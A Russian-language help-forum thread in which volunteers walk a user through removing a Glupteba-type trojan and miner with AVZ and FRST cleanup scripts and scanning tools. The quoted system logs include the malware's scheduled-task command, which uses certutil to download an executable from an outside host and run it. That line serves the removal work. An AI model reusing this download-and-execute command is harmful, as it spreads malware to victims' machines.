заражён winmon.sys и т.д.

[benkenobi3]

заражён winmon.sys и т.д. возможно майнер

антивирусы всё видят, но не удаляют

CollectionLog-2018.06.26-15.25.zip

[akoK]

Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО.

 

Выполните скрипт в AVZ (Файл - Выполнить скрипт):

 

begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
 SetServiceStart('WinDefender', 4);
 QuarantineFileF('c:\users\max\appdata\local\oneclick', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 ,0);
 QuarantineFile('C:\Users\Max\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe','');
 QuarantineFile('C:\Users\Max\appdata\roaming\system\libs\svchost.exe','');
 QuarantineFile('C:\Users\Max\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe','');
 QuarantineFile('C:\Windows\windefender.exe','');
 QuarantineFile('C:\Windows\rss\csrss.exe','');
 QuarantineFile('C:\Windows\System32\drivers\Winmon.sys','');
 QuarantineFile('C:\Windows\System32\drivers\WinmonFS.sys','');
 QuarantineFile('C:\Users\Max\AppData\Local\Temp\83A3B34C-E1ACC222-EC09C04D-8D573D97\2b438463.sys','');
 QuarantineFile('C:\Users\Max\AppData\Local\Temp\2c21d01e.sys','');
 QuarantineFile('c:\windows\windefender.exe','');
 QuarantineFile('c:\windows\rss\csrss.exe','');
 QuarantineFile('c:\users\max\appdata\local\temp\csrss\cloudnet.exe','');
  QuarantineFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys','');
 DeleteFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys','64'
 DeleteFile('c:\users\max\appdata\local\temp\csrss\cloudnet.exe','32');
 DeleteFile('c:\windows\rss\csrss.exe','32');
 DeleteFile('c:\windows\windefender.exe','32');
 DeleteFile('C:\Users\Max\appdata\local\temp\csrss\scheduled.exe','32');
 DeleteFile('C:\Users\Max\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe','32');
 DeleteFile('C:\Users\Max\appdata\roaming\system\libs\svchost.exe','32');
 DeleteFile('C:\Users\Max\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe','32');
 DeleteFile('C:\Windows\System32\drivers\WinmonFS.sys','64');
 DeleteFile('C:\Windows\System32\drivers\Winmon.sys','64');
 DeleteFileMask('c:\users\max\appdata\local\oneclick', '*', true);
 DeleteDirectory('c:\users\max\appdata\local\oneclick');
 RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','HolyStar');
 RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','CloudNet');
 DeleteService('WinDefender');
 DeleteService('WinmonFS');
 DeleteService('Winmon');
 DeleteService('WinmonProcessMonitor');
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
   BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
 BC_ImportALL;
RebootWindows(true);
end.

 

Компьютер перезагрузится. 

 

После перезагрузки, выполните такой скрипт:

 

 

begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pvirus quarantine ./Quarantine/', 1, 0, true);
end.

 

Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

 

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

 

O21 - HKLM\..\ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers: 00avast - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: ScheduledUpdate - C:\Windows\system32\cmd.exe /C certutil.exe -urlcache -split -f http://newscommer.com/app/app.exe C:\Users\Max\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Max\AppData\Local\Temp\csrss\scheduled.exe /31340

Скачайте AutorunsVTchecker. Распакуйте и запустите. Не дожидаясь окончания сканирования,

• Скачайте Universal Virus Sniffer

(uVS)

• Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".

• Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.

!!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.

• Дождитесь окончания работы программы и прикрепите лог к посту в теме.

!!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".

 

Подробнее читайте в руководстве Как подготовить лог UVS.

Изменено 26 июня, 2018 пользователем akoK
поправил скрипт

[benkenobi3]

Логи автозагрузки

Логи автозагрузки

по-моему там пусто. сейчас исправлю

uVS вылетает и лог не сохраняется

MAX-X_2018-06-26_16-13-36.zip

[akoK]

Образ не создался. Тогда

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Отметьте галочкой также "Shortcut.txt".

 

Нажмите кнопку Scan.

После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.

Подробнее читайте в этом руководстве.

[benkenobi3]

Галочку поставил, создалось 2 файла

Addition.txt

FRST.txt

[akoK]

1. Скачайте архив TDSSKiller.zip и распакуйте его в отдельную папку;

Запустите файл TDSSKiller.exe.

Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию.

В процессе проверки могут быть обнаружены объекты двух типов:

вредоносные (точно было установлено, какой вредоносной программой поражен объект);

подозрительные (тип вредоносного воздействия точно установить невозможно).

[*]По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием.

[*]Для вредоносных объектов утилита автоматически определяет действие: Лечить или Удалить.

[*]Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить).

[*]Самостоятельно без указания консультанта ничего не удаляйте!!!

[*]После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат.

[*]Прикрепите лог утилиты к своему следующему сообщению

По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\).

Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt

Например, C:\TDSSKiller.3.0.0.44_10.05.2015_13.39.01_log.txt

[benkenobi3]

Сделал

TDSSKiller.3.1.0.17_26.06.2018_19.00.47_log.txt

Изменено 26 июня, 2018 пользователем benkenobi3

[akoK]

Повторите сканирование TDSS и удалите все найденное, после подготовьте свежий лог Farbar Recovery Scan Tool

[benkenobi3]

Забавная штука. после перезапуска а) Касперский обнаружил ещё вирусов б) они прописались в автозагрузку
Ещё не сказал, что я заподозрил вирус после того, как у меня 2ipStartGuard перестал запускаться, Discord + некоторые exe-шники через минуту работы просто закрывались и удалялись.
На этот раз третий файл есть (который shortcut).

К примеру
Cloudnet.exe HEUR:Trojan-Proxy.Win32.Glupteba.gen Virustotal:

https://www.virustotal.com/ru/file/9413ed727350cba2e6cdea31eb3aa2d0bfbd90d29fab1c70147973d9527f0047/analysis/

Удивительно. Кажется получилось. Я сделал абсолютно всё сразу
AVZ + Kaspersky + удалил из автозагрузки всё, что показалось мне подозрительным
после перезагрузки прошёлся Cureit'ом ещё раз перезагрузил. чисто. везде чисто

TDSSKiller.3.1.0.17_26.06.2018_19.22.27_log.txt

Addition.txt

FRST.txt

Shortcut.txt

[akoK]

Лог FRST до или после чистки антивирусом сделали?

• Отключите до перезагрузки антивирус.

• Выделите следующий код:

Start::
CreateRestorePoint:
VirusTotal:C:\Users\Max\AppData\Local\THORN\Thorn.exe;C:\Users\Max\Desktop\ca74wg61.exe
() C:\Windows\rss\csrss.exe
() C:\Windows\windefender.exe
() C:\Users\Max\AppData\Local\Temp\wup\wup.exe
C:\Users\Max\AppData\Local\Temp\wup\wup.exe
C:\Windows\windefender.exe
C:\Windows\rss\csrss.exe
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\RunOnce: [{F3BFF8C5-1026-482C-AA9A-3B35C4431D19}] => cmd.exe /C start /D "C:\Users\Max\AppData\Local\Temp\{F3BFF8C5-1026-482C-AA9A-3B35C4431D19}" /B {A40471CA-067C-4E6B-AB27-ACD97E1237F9}.exe -accepteula -accepteulaksn -postboot <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-4265643976-3060469584-2905600739-1000\...\Run: [CloudNet] => C:\Users\Max\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2018-06-26] (EpicNet Inc.) <==== ATTENTION
HKU\S-1-5-21-4265643976-3060469584-2905600739-1000\...\Run: [HolyStar] => C:\Windows\rss\csrss.exe [3158016 2018-06-26] () <==== ATTENTION
HKU\S-1-5-21-4265643976-3060469584-2905600739-1000\...\Policies\system: [EnableLUA] 0
C:\Windows\rss\csrss.exe
HKU\S-1-5-21-4265643976-3060469584-2905600739-1000\...\MountPoints2: {6735e593-41b8-11e6-bb39-0021855b14e9} - G:\Lenovo_Suite.exe
HKU\S-1-5-21-4265643976-3060469584-2905600739-1000\...\MountPoints2: {83baf596-83ae-11e5-b481-0021855b14e9} - G:\installer.exe
HKU\S-1-5-21-4265643976-3060469584-2905600739-1000\...\MountPoints2: {e4c2a0e4-5e49-11e8-b4a0-0021855b14e9} - G:\AutoRun.exe
GroupPolicy: Restriction - Windows Defender <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
CHR HKU\S-1-5-21-4265643976-3060469584-2905600739-1000\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Toolbar: HKU\S-1-5-21-4265643976-3060469584-2905600739-1000 -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} -  No File
R2 WinDefender; C:\Windows\windefender.exe [1435136 2018-06-26] ()
S4 Winmon; C:\Windows\System32\drivers\Winmon.sys [9352 2018-06-26] () [File not signed]
C:\Windows\System32\drivers\Winmon.sys
S4 WinmonFS; \??\C:\Windows\System32\drivers\WinmonFS.sys [X]
C:\Windows\System32\drivers\WinmonFS.sys
S4 WinmonProcessMonitor; \??\C:\Windows\System32\drivers\WinmonProcessMonitor.sys [X] <==== ATTENTION
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
2018-06-26 19:22 - 2018-06-26 19:22 - 001435136 ____H C:\Windows\windefender.exe
2018-06-26 19:22 - 2018-06-26 19:22 - 000009352 _____ C:\Windows\system32\Drivers\Winmon.sys
2018-06-26 19:22 - 2018-06-26 19:22 - 000003164 _____ C:\Windows\System32\Tasks\csrss
2018-06-17 17:59 - 2018-06-26 19:22 - 000000000 ___HD C:\Windows\rss
C:\Users\Max\AppData\Roaming\EpicNet Inc\CloudNet
C:\Windows\rss\csrss.exe
CloudNet (HKU\S-1-5-21-4265643976-3060469584-2905600739-1000\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> [CC]{A6595CD1-BF77-430A-A452-18696685F7C7} =>  -> No File
ContextMenuHandlers1: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} =>  -> No File
ContextMenuHandlers1: [IObitUnstaler] -> [CC]{B19ED566-D419-470b-B111-3C89040BC027} =>  -> No File
ContextMenuHandlers2: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} =>  -> No File
ContextMenuHandlers2: [UltraISO] -> {AD392E40-428C-459F-961E-9B147782D099} =>  -> No File
ContextMenuHandlers4: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} =>  -> No File
ContextMenuHandlers4: [IObitUnstaler] -> [CC]{B19ED566-D419-470b-B111-3C89040BC027} =>  -> No File
ContextMenuHandlers4: [RisingRavExt] -> [CC]{1C7593CB-C1CC-4BA7-BE52-8EEA47F9CB1D} =>  -> No File
ContextMenuHandlers4: [UltraISO] -> {AD392E40-428C-459F-961E-9B147782D099} =>  -> No File
ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> [CC]{A6595CD1-BF77-430A-A452-18696685F7C7} =>  -> No File
ContextMenuHandlers6: [IObitUnstaler] -> [CC]{B19ED566-D419-470b-B111-3C89040BC027} =>  -> No File
ContextMenuHandlers6: [UltraISO] -> {AD392E40-428C-459F-961E-9B147782D099} =>  -> No File
Task: {0EF0E366-C216-4839-ADE7-F96FDB7305E7} - \Microsoft\Windows\AEB5E09BB-FF0D-485E-A836-1237C2C1DC51 -> No File <==== ATTENTION
Task: {6B66F8DF-8592-4422-B638-6753B561E3B1} - System32\Tasks\chrome5_logon => C:\Program Files (x86)\Microsoft Data\InstallAddons.exe
Task: {7369D2B8-5FEE-4DD3-B2A8-C39485FCB8F2} - \Microsoft\extsetup -> No File <==== ATTENTION
C:\Program Files (x86)\Microsoft Data\InstallAddons.exe
Task: {79B3177E-B267-4830-B1B5-C515E9B82D48} - \Microsoft\Windows\extsetup -> No File <==== ATTENTION
Task: {91F7C9F7-C664-428F-88C2-C1637EF3FCC1} - System32\Tasks\MRT => C:\Users\Max\AppData\Local\Temp\csrss\mrt.exe [2018-06-26] () <==== ATTENTION
Task: {9A471019-38BD-42CF-9E8E-203A90BFDFA1} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-06-26] () <==== ATTENTION
Task: {A03627BD-4E22-4739-A4A7-E37DE8EB3821} - \Microsoft\Windows\SafeBrowser -> No File <==== ATTENTION
Task: {C05EC292-DC24-4301-9726-6E360E2213A7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://newscommer.com/app/app.exe C:\Users\Max\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Max\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
FirewallRules: [{C6D49CA1-990A-4B11-AF59-0C7ADFAE527B}] => (Allow) LPort=1604
FirewallRules: [{7EC9A8DD-7FCE-4DF0-9703-5333521739FF}] => (Allow) LPort=1604
FirewallRules: [{3490B50E-26A0-47F9-AF6B-2EF4D43DD06E}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{D5593E10-C04B-4D9F-9846-C82F4ABE9184}] => (Allow) LPort=2869
FirewallRules: [{96E5BEFC-3DF3-4243-BAC7-5AACF4BD285D}] => (Allow) LPort=1900
FirewallRules: [{073412CD-518E-421A-86AB-63641AA91585}] => (Allow) LPort=80
FirewallRules: [{2088F147-D981-467D-ABBE-8DF827AAD382}] => (Allow) LPort=443
FirewallRules: [{19AEEE5E-FB65-4970-BEEC-3CE3F2276580}] => (Allow) LPort=20010
FirewallRules: [{AC52BB26-9AF8-49C4-8AFE-A88396DA2F2A}] => (Allow) LPort=3478
FirewallRules: [{287483C6-35A3-4228-B936-9FFB5A760EA1}] => (Allow) LPort=7850
FirewallRules: [{26B0B5AD-074C-444E-98E3-8166F592617F}] => (Allow) LPort=7852
FirewallRules: [{1955B653-AF3F-46F1-A26D-1079403B50C3}] => (Allow) LPort=7853
FirewallRules: [{B490F390-E3C6-4316-9E32-A8EEAC8E216F}] => (Allow) LPort=27022
FirewallRules: [{4706EB85-EDDF-4C5A-9B31-B9E8B6DF9C09}] => (Allow) LPort=6881
FirewallRules: [{687DC233-2952-4E97-B8FF-817F57EDB4C2}] => (Allow) LPort=33333
FirewallRules: [{45CB2FF5-50D3-4A97-AE8F-8859FEB1E29C}] => (Allow) LPort=20443
FirewallRules: [{6464BDCA-48E6-4E54-95FA-BEB33169C889}] => (Allow) LPort=8090
FirewallRules: [{B6B62BD7-DC7D-46B5-BEB7-32FEB47BE15E}] => (Allow) C:\Users\Max\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{F1C826B7-A267-4499-944C-6CA655582CAB}] => (Allow) C:\Users\Max\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{04D90F48-AEC0-4C74-822D-0E02973CF5C2}] => (Allow) C:\Users\Max\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{505E5761-AD0C-49CA-9A05-FF18010BF824}] => (Allow) C:\Users\Max\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{A395DA6D-BAD0-4780-B4F4-9B1BC3023E0B}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{650EDA01-2E25-4155-969B-45B448C26FA7}] => (Allow) C:\Users\Max\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{0FF73B43-D19A-4DCA-8A42-E1B20618AE46}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{13862412-D0DC-49A5-9DCD-E6796D2242C9}] => (Allow) C:\Users\Max\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{71FD94E6-E013-4456-B86D-5D0AA0BF93E0}] => (Allow) C:\Users\Max\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{B8334CDA-D75C-4E8E-90BD-4C7D2136D551}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{A45E57B6-860E-40C4-873E-8016FF64F90C}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{89E69F4D-EF8A-46F9-8831-68507390F900}] => (Allow) C:\Users\Max\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{F2AC7C94-6B18-4A63-9629-892EEB24DD0F}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{70D8F5E7-6365-491F-9D6C-4242D1B15027}] => (Allow) C:\Users\Max\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
EmptyTemp:
Reboot:
End::

• Скопируйте выделенный текст (правой кнопкой - Копировать).

• Запустите FRST (FRST64) от имени администратора.

• Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

 

Подробнее читайте в этом руководстве.

Скачайте AdwCleaner и сохраните его на Рабочем столе.

Запустите его (в ОС Vista/Windows 7, 8, 8.1, 10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.

Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[s0].txt.

Прикрепите отчет к своему следующему сообщению.

 

Подробнее читайте в этом руководстве.

Изменено 26 июня, 2018 пользователем akoK

[benkenobi3]

Логи

Fixlog.txt

AdwCleanerS00.txt

[Sandor]

• Запустите повторно AdwCleaner (by Malwarebytes) (программу необходимо запускать через правую кн. мыши от имени администратора).
• В меню Настройки включите дополнительно в разделе Базовые действия:
  • Сбросить политики IE
  • Сбросить политики Chrome
• В меню Панель управления нажмите Сканировать.
• По окончании нажмите кнопку Очистить и восстановить и дождитесь окончания удаления.
• Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt (где x - любая цифра).
• Прикрепите отчет к своему следующему сообщению

Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

 

Подробнее читайте в этом руководстве.

[akoK]

И попробуйте подготовить лог UVS для контроля.